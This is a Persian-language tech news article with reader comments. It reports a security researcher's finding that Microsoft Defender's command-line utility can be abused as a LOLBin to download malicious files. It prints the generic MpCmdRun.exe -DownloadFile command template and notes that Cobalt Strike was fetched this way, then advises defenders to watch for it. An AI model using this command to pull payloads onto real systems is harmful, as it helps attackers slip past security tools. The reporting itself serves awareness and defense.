ثبت بازخورد

لطفا میزان رضایت خود را از دیجیاتو انتخاب کنید.

Very satisfied Satisfied Neutral Dissatisfied Very dissatisfied
واقعا راضی‌ام
اصلا راضی نیستم
چطور میتوانیم تجربه بهتری برای شما بسازیم؟

نظر شما با موفقیت ثبت شد.

از اینکه ما را در توسعه بهتر و هدفمند‌تر دیجیاتو همراهی می‌کنید
از شما سپاسگزاریم.

تکنولوژی

آنتی ویروس ویندوز ۱۰ می‌تواند بدافزار دانلود کند

به گفته یکی از محققان امنیتی به‌روزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایل‌های مخرب از اینترنت تبدیل کرده است. یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار ...

پیمان حسنی
پیمان حسنی منتشر شده در ۱۴ شهریور ۱۳۹۹  |  ۱۹:۰۰

در دیجیاتو ثبت‌نام کنید

جهت بهره‌مندی و دسترسی به امکانات ویژه و بخش‌های مختلف در دیجیاتو عضو ویژه دیجیاتو شوید.

عضویت در دیجیاتو

ویدئوی مرتبط

چند گیگابایت رم کافیست؟
دیجی‌تک آیا رم ۸ گیگ در مک معادل ۱۶ گیگ در ویندوز است؟

به گفته یکی از محققان امنیتی به‌روزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایل‌های مخرب از اینترنت تبدیل کرده است.

یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه می‌دهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایل‌های معتبر سیستم عامل که می‌توان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته می‌شود.

LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز می‌توانند از این فایل‌ها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.

آنطور که Askar می‌گوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی می‌کند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است.

هکرها با نفوذ به شبکه محلی می‌توانند با استفاده از ابزار Microsoft Antimalware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:

<MpCmdRun.exe -DownloadFile -url <url> -path <local-path

محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد.

دیفندر قادر به شناسایی و حذف فایل‌های مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایل‌های مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه می‌شود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.

کانال دیجیاتو در تلگرام
بدافزار ویندوز
7 0
دیدگاه‌ها و نظرات خود را بنویسید
نظرات ثبت شده (7 مورد)
  • disna
    disna۱۵ شهریور ۱۳۹۹

    آنتی ویروس ویندوز دیفندر بد نیست. ولی اگر امنیت براتون مهمه بهتره ی آنتی ویروس معتبر و ترجیحآ باکیفیت استفاده کنین.

    هر چی آنتی ویروس باکیفیت تر باشه. سطح امنیتی بالاتر و بهتر هستش

    دیسنا: خبرنامه تخصصی آنتی ویروس ها

    پاسخ
  • haashmo
    haashmo۱۴ شهریور ۱۳۹۹

    درود.آقا این مشکل ورود به سایت رو درست کنید که شده دردسر واسه ما.هر باز میخوایم وارد شیم پیغام خطا میده.این Recapcha رو بردارید.

    پاسخ
  • molavy
    molavy۱۴ شهریور ۱۳۹۹

    دروغ ننویسید، فقط برنامه های ایرانی بد افزار هستند، یعنی شرکتی با چند صد هزار کارمند نمیتونه برنامه خودش و مدیریت کنه؟ اونم یک شرکت آمریکایی؟

    پاسخ
    • dastan
      dastan۱۵ شهریور ۱۳۹۹

      نوگل باغ آلبانی چرت نگو عزیزم باشه؟

      پاسخ
    • sata
      sata۱۵ شهریور ۱۳۹۹

      نه نمیتونه. حالا دیگه چرت نگو!

      پاسخ
    • ali_mlk
      ali_mlk۱۵ شهریور ۱۳۹۹

      اصلا ربطی نداره و اون چند صد هزار کارمند هم فقط مختص ویندوز دیفندر نیستن که، این نوع مشکلات بهشون میگن باگ که هکرها با استفاده از توانمندی و تبحری که در برنامه نویسی دارن ، پیداشون میکنن این حفره های امنیتی رو و بعدا با شناسایی این حفره تیم سازنده در سریعترین زمان ممکن رفعش میکنه، به هرحال توی هر نرم افزاری ممکنه پیش بیاد و نیازمند زمان بیشتر برای تست هست، که در آینده با هوش مصنوعی تقریبا این باگ ها با ضریب بالایی برطرف میشن

      پاسخ
    • Mahdian888
      Mahdian888۱۵ شهریور ۱۳۹۹

      فقط میتونم به پیامت بخندم ??

      پاسخ
مطالب پیشنهادی

پیشنهادهای دیجیاتو